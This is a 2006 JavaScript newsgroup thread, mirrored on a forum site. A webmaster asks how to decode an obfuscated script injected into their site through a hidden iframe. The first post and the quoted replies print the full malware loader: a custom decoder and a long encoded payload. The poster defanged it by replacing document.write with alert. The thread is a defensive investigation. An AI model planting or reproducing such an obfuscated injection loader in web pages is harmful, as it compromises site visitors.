473,320 Members | 1,832 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,320 software developers and data experts.

Decoder for obfuscated code?

Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.
I want to take a look at the code.

Thanks!
<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,5 3,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0, 26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11, 10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}
dc("a_HDcBY@icbCvFIEjgIE0R6BvkmDdZ3@ncXAZS5Jww2Cts mBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6 HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xk rBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@mlmD ccM@vRaPW_mDaOn4oOnEooYAm4L@v4rOvVHEjRnEosH@o_nDqN nE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8 KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8 bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYR qB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqN nE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bC IFMDmg3@QsXRdgIRdCrRwWqQj5qBn4rO9s2@nFIEol3@pRI6mg 3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaP edLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1 l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oO MQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7 exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTF V@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7 ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSSc qQm8l74c25R4kQoxLTZBbCjOb48zb@JwW@HF798NrQe9Izi5lR ewq7ew6Se5zznOnQmsL4ndmQR4FzodLzzoVCj9nQTBb@jWzzjG rQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbC jObQWxa@JwW@jGrQENrRqwaSHFkQeoG3181Se9XSScaB18l7nd mCmzV4odLzzBbCj9YQGBb@jxW@TFbPXNM7exaBHw11ew671s1S e9XSCNnQmo69ndH7jCb4oda8qpWPj5VQGBb@JkGz1FbP1zkRqw aBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@ JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4ox LTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQ qpqQjdmQR4V7oda8qxaPj5V48zb@JwW@HFbQ4gG3qwLzhG21eo 19e4zSiGF2jdqQmoqQjdmQ8zkQoda8qxaPj5kQYzb@jGkRTFbQ 4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5 VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmC mVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiG k6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@jWzzTFrQt1F7exLz i5lRewq7ew6Se9XSjdqQmsa@jdmQ8zV4ox66qpWPj9nQYzb@jl GzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8 qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9 l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61 nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@JwW@TFrQEN rQexaSHw11eFl7e81Se9XSjdqQ1wq8kd25R4FzoG21QBbCj9YQ TFV@jxW@TFrQthlRqwaBhG21eFl7e81Sj_79CNnQ1sqBkdmCC4 V7oG219oWPm4V4UBb@SwqRTF794FmRq8Izi5qQewq7e81Sj_r6 jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5 lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@JwW@ TFrQthlRqwaBhGmReF1714zSjxVSScqQm8l7nd25R4V4oxLTzB bCj5kQYzb@JwW@HF794FmRqwLzjtlReRYBsw6Se5k6CNYB1sa7 4cH7mzkQoda8qpWPj9Y4UFV@JkGzjGrQtGmRqwaSHVzReFl7e8 1SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnT TzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz 76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmE h5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCN nQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzz zoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eo a7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7 khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4 W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ 34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nN Gzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@ S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7od Lz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlR qpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJo WPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67 os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBnc mQmwaNi4GTr8IEPsX4mVFAroIzMF2984z9wGVBJBz2GkmzFkbP e97Umpn8cll3Lgk6x8k2xCMNM1_Op_HDcBY@iFq")

</script>

Sep 22 '06 #1
3 3084
The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

zs****@yahoo.com wrote:
Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.
I want to take a look at the code.

Thanks!
<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,5 3,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0, 26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11, 10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}
dc("a_HDcBY@icbCvFIEjgIE0R6BvkmDdZ3@ncXAZS5Jww2Cts mBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6 HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xk rBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@mlmD ccM@vRaPW_mDaOn4oOnEooYAm4L@v4rOvVHEjRnEosH@o_nDqN nE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8 KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8 bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYR qB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqN nE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bC IFMDmg3@QsXRdgIRdCrRwWqQj5qBn4rO9s2@nFIEol3@pRI6mg 3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaP edLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1 l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oO MQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7 exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTF V@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7 ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSSc qQm8l74c25R4kQoxLTZBbCjOb48zb@JwW@HF798NrQe9Izi5lR ewq7ew6Se5zznOnQmsL4ndmQR4FzodLzzoVCj9nQTBb@jWzzjG rQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbC jObQWxa@JwW@jGrQENrRqwaSHFkQeoG3181Se9XSScaB18l7nd mCmzV4odLzzBbCj9YQGBb@jxW@TFbPXNM7exaBHw11ew671s1S e9XSCNnQmo69ndH7jCb4oda8qpWPj5VQGBb@JkGz1FbP1zkRqw aBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@ JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4ox LTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQ qpqQjdmQR4V7oda8qxaPj5V48zb@JwW@HFbQ4gG3qwLzhG21eo 19e4zSiGF2jdqQmoqQjdmQ8zkQoda8qxaPj5kQYzb@jGkRTFbQ 4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5 VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmC mVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiG k6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@jWzzTFrQt1F7exLz i5lRewq7ew6Se9XSjdqQmsa@jdmQ8zV4ox66qpWPj9nQYzb@jl GzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8 qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9 l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61 nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@JwW@TFrQEN rQexaSHw11eFl7e81Se9XSjdqQ1wq8kd25R4FzoG21QBbCj9YQ TFV@jxW@TFrQthlRqwaBhG21eFl7e81Sj_79CNnQ1sqBkdmCC4 V7oG219oWPm4V4UBb@SwqRTF794FmRq8Izi5qQewq7e81Sj_r6 jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5 lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@JwW@ TFrQthlRqwaBhGmReF1714zSjxVSScqQm8l7nd25R4V4oxLTzB bCj5kQYzb@JwW@HF794FmRqwLzjtlReRYBsw6Se5k6CNYB1sa7 4cH7mzkQoda8qpWPj9Y4UFV@JkGzjGrQtGmRqwaSHVzReFl7e8 1SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnT TzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz 76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmE h5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCN nQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzz zoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eo a7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7 khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4 W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ 34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nN Gzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@ S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7od Lz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlR qpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJo WPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67 os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBnc mQmwaNi4GTr8IEPsX4mVFAroIzMF2984z9wGVBJBz2GkmzFkbP e97Umpn8cll3Lgk6x8k2xCMNM1_Op_HDcBY@iFq")

</script>
Sep 22 '06 #2
JRS: In article <11**********************@i3g2000cwc.googlegroups. com>,
dated Fri, 22 Sep 2006 13:59:01 remote, seen in
news:comp.lang.javascript, zs****@yahoo.com posted :
>Lines: 61
>The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!
Do not top-post or over-quote - see FAQ.

You can run it yourself and read the alert; or you can safely use a
textarea to display r. Then you will be able to see what it decodes to.
It's a good idea to read the newsgroup and its FAQ.
--
© John Stockton, Surrey, UK. ?@merlyn.demon.co.uk Turnpike v4.00 IE 4 ©
<URL:http://www.jibbering.com/faq/>? JL/RC: FAQ of news:comp.lang.javascript
<URL:http://www.merlyn.demon.co.uk/js-index.htmjscr maths, dates, sources.
<URL:http://www.merlyn.demon.co.uk/TP/BP/Delphi/jscr/&c, FAQ items, links.
Sep 23 '06 #3
Well genius if you had run it you would have seen that is not the
answer. Jeez, anyone else besides the good doctor have any ideas?

Dr John Stockton wrote:
JRS: In article <11**********************@i3g2000cwc.googlegroups. com>,
dated Fri, 22 Sep 2006 13:59:01 remote, seen in
news:comp.lang.javascript, zs****@yahoo.com posted :
Lines: 61
The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

Do not top-post or over-quote - see FAQ.

You can run it yourself and read the alert; or you can safely use a
textarea to display r. Then you will be able to see what it decodes to.
It's a good idea to read the newsgroup and its FAQ.
--
© John Stockton, Surrey, UK. ?@merlyn.demon.co.uk Turnpike v4.00 IE 4 ©
<URL:http://www.jibbering.com/faq/>? JL/RC: FAQ of news:comp.lang.javascript
<URL:http://www.merlyn.demon.co.uk/js-index.htmjscr maths, dates, sources.
<URL:http://www.merlyn.demon.co.uk/TP/BP/Delphi/jscr/&c, FAQ items, links.
Sep 25 '06 #4

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

0
by: S Etchelecu | last post by:
I'm having trouble understanding the MIME::Decoder usage. Within the context of a MIME email handling program I have an array, @data, and I want to uuencode it. I thought I could instantiate a...
4
by: fix | last post by:
Hello, i need to protect my xsl file. In my xsl i have a mechanism for defining a personal stylesheet, what i want to do is, if it possible, find a mechanism for Obfuscated the xsl source code ....
1
by: assaf | last post by:
hi all i am using PreEmptive Solutions dotfuscator (community edition). and i am getting 'TypeLoadException' for a simple interface that i defined. how can i debug an obfuscated application? ...
4
by: Paul E Collins | last post by:
For those who appreciate such things, here's a bit of obfuscated C# I knocked up in a spare moment at work. http://CL4.org/comp/jabberwocky.txt P. -- www.CL4.org
0
by: Whitney | last post by:
I'm not sure which category this would fall under, but I assumed that something dealing with languages would be as good a place as any. I was sent a message using characters such as Z|¥" (which...
4
by: Bry | last post by:
I'm trying Obfuscation for the first time using the community edition of dotfuscator that ships with vs .net 2005. After building my code, I load the compiled .exe into dotfuscator and let it...
1
by: pawan123 | last post by:
Hi, I am using VB6 and SQL Server 2000. I want to design a logon form. In this form, how can I use a Password field to store in encrypted form in tbluser table and how can I compare password...
6
by: Nebulism | last post by:
Hey everyone, I am currently creating images pixel by pixel. This is too slow for many images. Anyways, I want to use the fromstring module in the Image library. I have read at this url,...
6
by: Ankit | last post by:
Hi everyone,i wanted to build a flash decoder using python can somebody tell me which library to use and what steps should i follow to make a flash(video) decoder?By a decoder i mean that i need to...
0
by: DolphinDB | last post by:
Tired of spending countless mintues downsampling your data? Look no further! In this article, you’ll learn how to efficiently downsample 6.48 billion high-frequency records to 61 million...
0
by: ryjfgjl | last post by:
ExcelToDatabase: batch import excel into database automatically...
0
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
1
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
0
by: Vimpel783 | last post by:
Hello! Guys, I found this code on the Internet, but I need to modify it a little. It works well, the problem is this: Data is sent from only one cell, in this case B5, but it is necessary that data...
1
by: PapaRatzi | last post by:
Hello, I am teaching myself MS Access forms design and Visual Basic. I've created a table to capture a list of Top 30 singles and forms to capture new entries. The final step is a form (unbound)...
0
by: Defcon1945 | last post by:
I'm trying to learn Python using Pycharm but import shutil doesn't work
0
by: Faith0G | last post by:
I am starting a new it consulting business and it's been a while since I setup a new website. Is wordpress still the best web based software for hosting a 5 page website? The webpages will be...
0
isladogs
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 3 Apr 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome former...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.